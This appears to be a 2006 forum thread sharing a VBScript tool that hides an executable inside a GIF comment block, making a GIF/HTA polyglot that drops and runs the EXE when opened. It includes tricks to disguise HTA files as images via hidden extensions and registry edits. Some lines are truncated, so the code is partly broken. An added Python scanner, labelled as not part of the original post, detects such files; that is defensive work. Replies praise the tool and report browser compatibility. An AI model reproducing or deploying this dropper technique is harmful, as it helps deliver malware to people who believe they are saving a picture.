Steganography hide EXE data within a GIF image


Steganography hide EXE data within a GIF image
I discovered a pretty good VBS script that hides executable code in a *.GIF file ... And the best part is that in IE and Firefox the image is displayed, and when you right-click it and choose "Save As .." it is saved as FILE.HTA, which contains the executable code ....

This is the link to the author [link]

This image contains a little Hypnotic program (a hypnotizing spinning spiral)
' Source code
' Title: Steganography: Hiding Data Within Data.
' Author: Vengy! (-_-)
' Tested: WinXP SP2 IE 6.0
' Email:

' How it works:
' -------------
' Usage: cscript.exe hide.vbs your.gif your.exe

' This script merges "your.gif" and "your.exe" to create "your.gif.hta.gif",
' which correctly displays using the IE browser. ;)
' If the 'Hide extension for known file types' option is enabled, which is the default setting,
' the "Save Picture As..." downloads it as "your.gif". (it's really "your.gif.hta")

' Important:
' ----------
' Not all GIFs will work!? Trial and error is the best method
' to find suitable images. Included are some working GIFs that
' will merge correctly with any EXE. The image "your.gif" must be a GIF89a type and *not* GIF87a.

' GIF87a Versus GIF89a:
' ---------------------
' There are technically two types of GIF file: GIF87a and the newer, improved GIF89a.
' Both are fully supported on most browsers, and both use .gif as their file name suffix.
' GIF87a is the original format for indexed color images.
' It uses LZW compression and has the option of being interlaced.

' GIF89a is the same, but also includes transparency and animation capabilities.
' If you want to add these features to your graphic, you'll need to create the graphic with a tool
' that supports the GIF89a format. These features have become so popular with web developers that
' this format has become the de facto standard on the Web today.

' +------------------------------------------
' | Let the games begin! |
' +------------------------------------------

Option Explicit

Dim data,p,i,f,file,ub,ts,pic_buf,pic,args,x

set args=WScript.Arguments

If args.Count<>2 Then
WScript.Echo "Please type the following: cscript.exe hide.vbs your.gif your.exe"
End If


Dim o:Set o=CreateObject("Scripting.FileSystemObject"
Dim s:Set s=CreateObject("WScript.Shell")

'To change the HTA file icon to a GIF, uncomment these 2 lines:
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\","GIF Image","REG_SZ"
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\DefaultIcon\

Set f=o.CreateTextFile(pic&".hta.gif",2)

WScript.Echo "Processing "&pic&" ..."


' Remove end of gif hex tag 3B.
f.Write Left(pic_buf,len(pic_buf)-1)

' +------------------------------------------
' | BEGIN: GIF comment block. |
' +------------------------------------------

' Start new block tag.
f.Write chr(Int("&H21"))

' Comment tag.
f.Write chr(Int("&HFE"))

' Length of subblock. Seems to work!?
f.Write chr(Int("&HFF"))

' Start data vbscript
f.WriteLine "<script language=vbs>"
f.WriteLine "Set o=CreateObject("&chr(34)&"Scripting
f.WriteLine "Set s=CreateObject("&chr(34)&"WScript.S
f.WriteLine "p=o.GetSpecialFolder(2)&"&chr(34)&

' Create data hex array.
f.Write "t=split("&chr(34)
WScript.Echo "Processing "&file&" ..."
For i=0 To ub-1
f.Write data(i)&","
f.Write data(ub)
f.WriteLine chr(34)&","&chr(34)&","&chr

f.WriteLine "Set f=o.CreateTextFile(p,2)"
f.WriteLine "For i=0 To UBound(t)"
f.WriteLine "f.Write chr(Int("&chr(34)&"&H"&chr(
f.WriteLine "Next"
f.WriteLine "f.close"

' Run the data!
f.WriteLine ""

f.WriteLine "close()"

' End data vbscript.
f.WriteLine "</script>"

' End of comment block.
f.Write chr(Int("&H00"))

' +------------------------------------------
' | END: GIF comment block. |
' +------------------------------------------

' Insert end of gif tag.
f.Write chr(Int("&H3B"))


' +------------------------------------------
' | Done. Your.gif.hta.gif has been created. |
' +------------------------------------------

Set x=o.GetFile(pic&".hta.gif")

WScript.Echo "Created "&chr(34)&pic&".hta.gif"&chr(34)&" (bytes="&x.Size&")"

' +------------------------------------------
' | Turns ASCII string sData into array of hex numerics. |
' +------------------------------------------
Function AsciiToHex(sData)
Dim i, aTmp()

ReDim aTmp(Len(sData) - 1)

For i = 1 To Len(sData)
aTmp(i - 1) = Hex(Asc(Mid(sData, i)))
If len(aTmp(i - 1))=1 Then aTmp(i - 1)="0"+ aTmp(i - 1)

ASCIItoHex = aTmp
End Function

' +------------------------------------------
' | Converts binary data to a string (BSTR) using ADO recordset. |
' +------------------------------------------
Function RSBinaryToString(xBinary)
Dim Binary
'MultiByte data must be converted To VT_UI1 | VT_ARRAY first.
If vartype(xBinary)=8 Then Binary = MultiByteToBinary(xBinary) Else Binary = xBinary
Dim RS, LBinary
Const adLongVarChar = 201
Set RS = CreateObject("ADODB.Recordset")
LBinary = LenB(Binary)

If LBinary>0 Then
RS.Fields.Append "mBinary", adLongVarChar, LBinary
RS("mBinary").AppendChunk Binary
RSBinaryToString = RS("mBinary")
RSBinaryToString = ""
End If
End Function

' +------------------------------------------
' | Read Binary file |
' +------------------------------------------
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream : Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
End Function

BOGIIE & Hacker112 | 85.207.107.* | 26.12.2006 10:14
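Added example, not part of the original post or the script's author's code: a Python check a mail or web gateway could run to catch the file layout the script above produces, namely script text carried in a GIF comment extension (0x21 0xFE) whose fixed 0xFF length byte usually breaks the sub-block chain. The marker list, finding strings and sample files are assumptions constructed for illustration.

```python
import struct

MARKERS = (b"<script", b"<hta:")   # assumed marker list; extend per policy

def _skip_table(pos, packed):
    # Bit 7 set: a color table of 3 * 2^(N+1) bytes follows.
    return pos + (3 * (2 << (packed & 7)) if packed & 0x80 else 0)

def _sub_blocks(buf, pos):
    """Read length-prefixed sub-blocks up to the 0x00 terminator."""
    out = bytearray()
    while True:
        size = buf[pos]
        if pos + 1 + size > len(buf):
            raise IndexError("sub-block runs past end of file")
        if size == 0:
            return bytes(out), pos + 1
        out += buf[pos + 1:pos + 1 + size]
        pos += 1 + size

def scan_gif(buf):
    """Return findings for one GIF byte string; an empty list means clean."""
    if buf[:6] not in (b"GIF87a", b"GIF89a"):
        return ["not a GIF"]
    findings = []
    try:
        pos = _skip_table(13, buf[10])
        while buf[pos] != 0x3B:                      # 0x3B = trailer
            if buf[pos] == 0x21:                     # extension block
                label = buf[pos + 1]
                data, pos = _sub_blocks(buf, pos + 2)
                if label == 0xFE and any(m in data.lower() for m in MARKERS):
                    findings.append("script in comment block")
            elif buf[pos] == 0x2C:                   # image descriptor
                pos = _skip_table(pos + 10, buf[pos + 9])
                _, pos = _sub_blocks(buf, pos + 1)   # pos + 1 skips LZW code size
            else:
                raise ValueError("unknown block tag")
        if pos + 1 != len(buf):
            findings.append("data after trailer")
    except (IndexError, ValueError):
        findings.append("malformed block structure")
    # Fallback: a broken chain can hide the text from the block walker.
    if "script in comment block" not in findings and any(m in buf.lower() for m in MARKERS):
        findings.append("script marker in raw bytes")
    return findings

# Constructed 1x1 GIF89a and two variants carrying harmless placeholder text.
CLEAN = (b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0) + bytes(6) +
         b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0) + b"\x02\x02\x4c\x01\x00\x3b")
TEXT = b"<script language=vbs>\r\n' placeholder\r\n</script>\r\n"
WELL_FORMED = CLEAN[:-1] + b"\x21\xfe" + bytes([len(TEXT)]) + TEXT + b"\x00\x3b"
PAGE_STYLE = CLEAN[:-1] + b"\x21\xfe\xff" + TEXT + b"\x00\x3b"  # fixed 0xFF length
```

The raw-byte fallback will also fire on legitimate GIFs whose pixel data happens to contain a marker, so treat it as a triage signal rather than a verdict.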
re: Steganography hide EXE data within a GIF imag
Nice little thing :)
(reply) | 88.146.11.* | 26.12.2006 13:51
re: Steganography hide EXE data within a GIF image
Doesn't work in Opera 8-) it's probably a secure browser. But it's pretty LOL!!

don't argue, it's pointless | personal blog: [link]
mzk | E-mail | Website | 26.12.2006 15:47
re: Steganography hide EXE data within a GIF imag
The FF 2 and W98 combination doesn't work either..
Nemam | 72.22.69.* | 26.12.2006 16:21